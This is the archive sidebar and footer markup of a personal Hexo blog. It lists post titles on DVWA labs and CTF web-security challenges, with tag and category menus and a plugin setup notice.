            <span class="archive-post-date">02/26</span><a class="archive-post-title" href= "/2021/02/26/dvwa/XSS-reflected/" >XSS-reflected</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/25</span><a class="archive-post-title" href= "/2021/02/25/dvwa/SQL%20Injection/" >SQL Injection</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/24</span><a class="archive-post-title" href= "/2021/02/24/dvwa/File%20inclusion/" >File inclusion</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/23</span><a class="archive-post-title" href= "/2021/02/23/dvwa/CSRF/" >CSRF</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/21</span><a class="archive-post-title" href= "/2021/02/21/dvwa/Command%20injection/" >Command injection</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/20</span><a class="archive-post-title" href= "/2021/02/20/dvwa/Brute%20Force/" >Brute Force</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/15</span><a class="archive-post-title" href= "/2021/02/15/CDN%E8%AE%B2%E8%A7%A3/" >CDN</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/01</span><a class="archive-post-title" href= "/2021/02/01/xctf/i-got-id-200/" >i-got-id-200--ARGV的利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/01</span><a class="archive-post-title" href= "/2021/02/01/xctf/kk/" >Flat---sql注入之sqlite3数据库</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/26</span><a class="archive-post-title" href= "/2020/11/26/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/" >Burp suit</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/26</span><a class="archive-post-title" href= "/2020/11/26/xctf/unfinsh/" >unfinsh--二次注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/18</span><a class="archive-post-title" href= "/2020/11/18/xctf/fakebook/" >fakebook--sql注入和反序列-file伪协议</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/18</span><a class="archive-post-title" href= "/2020/11/18/xctf/Cat/" >Cat---%80报错和@前缀发送文件</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/16</span><a class="archive-post-title" href= "/2020/11/16/xctf/favorite-number/" >favorite_number-溢出绕过-跨行绕过-tac绕过</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/16</span><a class="archive-post-title" href= "/2020/10/16/xctf/web%E6%96%B0%E6%89%8B%E9%A2%98/" >web新手题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/16</span><a class="archive-post-title" href= "/2020/10/16/xctf/web%E8%BF%9B%E9%98%B6%E9%A2%98/" >web进阶</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/15</span><a class="archive-post-title" href= "/2020/10/15/my%20first%20blog/" >Mac下基于GitHub的Hexo博客搭建</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="知识普及"><span class="iconfont-archer">&#xe606;</span>知识普及</span>
    
        <span class="sidebar-tag-name" data-tags="小问题"><span class="iconfont-archer">&#xe606;</span>小问题</span>
    
        <span class="sidebar-tag-name" data-tags="XCTF"><span class="iconfont-archer">&#xe606;</span>XCTF</span>
    
        <span class="sidebar-tag-name" data-tags="工具使用"><span class="iconfont-archer">&#xe606;</span>工具使用</span>
    
        <span class="sidebar-tag-name" data-tags="DVWA"><span class="iconfont-archer">&#xe606;</span>DVWA</span>
    
        <span class="sidebar-tag-name" data-tags="upload"><span class="iconfont-archer">&#xe606;</span>upload</span>
    
        <span class="sidebar-tag-name" data-tags="xss"><span class="iconfont-archer">&#xe606;</span>xss</span>
    
        <span class="sidebar-tag-name" data-tags="sql"><span class="iconfont-archer">&#xe606;</span>sql</span>
    
        <span class="sidebar-tag-name" data-tags="代码审计"><span class="iconfont-archer">&#xe606;</span>代码审计</span>
    
        <span class="sidebar-tag-name" data-tags="bugku"><span class="iconfont-archer">&#xe606;</span>bugku</span>
    
        <span class="sidebar-tag-name" data-tags="CTF比赛"><span class="iconfont-archer">&#xe606;</span>CTF比赛</span>
    
        <span class="sidebar-tag-name" data-tags="SSRF"><span class="iconfont-archer">&#xe606;</span>SSRF</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="知识普及"><span class="iconfont-archer">&#xe60a;</span>知识普及</span>
    
        <span class="sidebar-category-name" data-categories="功防世界"><span class="iconfont-archer">&#xe60a;</span>功防世界</span>
    
        <span class="sidebar-category-name" data-categories="小问题"><span class="iconfont-archer">&#xe60a;</span>小问题</span>
    
        <span class="sidebar-category-name" data-categories="工具使用"><span class="iconfont-archer">&#xe60a;</span>工具使用</span>
    
        <span class="sidebar-category-name" data-categories="DVWA"><span class="iconfont-archer">&#xe60a;</span>DVWA</span>
    
        <span class="sidebar-category-name" data-categories="sql-lab"><span class="iconfont-archer">&#xe60a;</span>sql-lab</span>
    
        <span class="sidebar-category-name" data-categories="xss-lab"><span class="iconfont-archer">&#xe60a;</span>xss-lab</span>
    
        <span class="sidebar-category-name" data-categories="upload-labs"><span class="iconfont-archer">&#xe60a;</span>upload-labs</span>
    
        <span class="sidebar-category-name" data-categories="bugku"><span class="iconfont-archer">&#xe60a;</span>bugku</span>
    
        <span class="sidebar-category-name" data-categories="CTF比赛"><span class="iconfont-archer">&#xe60a;</span>CTF比赛</span>
    
        <span class="sidebar-category-name" data-categories="SSRF"><span class="iconfont-archer">&#xe60a;</span>SSRF</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "JOe KKK"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


